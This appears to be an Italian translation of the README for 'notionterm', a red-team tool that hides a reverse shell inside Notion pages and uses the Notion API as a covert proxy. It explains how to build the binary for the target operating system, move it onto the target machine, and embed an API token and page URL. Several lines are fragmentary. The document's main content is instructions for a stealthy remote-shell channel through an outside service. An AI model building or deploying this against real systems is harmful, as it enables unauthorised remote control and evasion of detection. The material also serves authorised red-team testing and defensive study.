
Incorporare una reverse shell nelle pagine di Notion utilizzando l'API di Notion come proxy, consentendo sessioni stealth di shell remota con comunicazione crittografata e autenticata per operazioni di red team.

notionterm sul target.
approssimativamente ispirato dalla grande idea di OffensiveNotion e notionion!
Imparare comandi e flag è troppo noioso: Usa wrap-notionterm.sh
notionterm e trasferiscilo sulla macchina target (vedi Compilazione)Ci sono 3 modi principali per eseguire notionterm:
notionterm [flags]
ON, fai le tue cose di reverse shell, imposta su OFF per mettere in pausa, imposta su ON per riprendere, ecc...
notionterm --server [flags]
CTRL+L per ottenerlo): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
light
notionterm light [flags]
Poiché notionterm è pensato per essere eseguito sulla macchina target, deve essere compilato per adattarsi ad essa.
Quindi imposta la variabile d'ambiente in base ai requisiti del target:
GOOS=[windows/linux/darwin]
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
Dovrai impostare la chiave API e l'URL della pagina di Notion usando variabili d'ambiente (NOTION_TOKEN & NOTION_PAGE_URL) o flag (--token & --page-url)
Incorpora direttamente il token API dell'integrazione Notion e l'URL della pagina di Notion nel binario. ⚠️ Chiunque abbia accesso al binario può recuperare il token. Per motivi di sicurezza non condividerlo e rimuovilo dopo l'uso.
Imposta le variabili d'ambiente corrispondenti:
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
E compila:
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS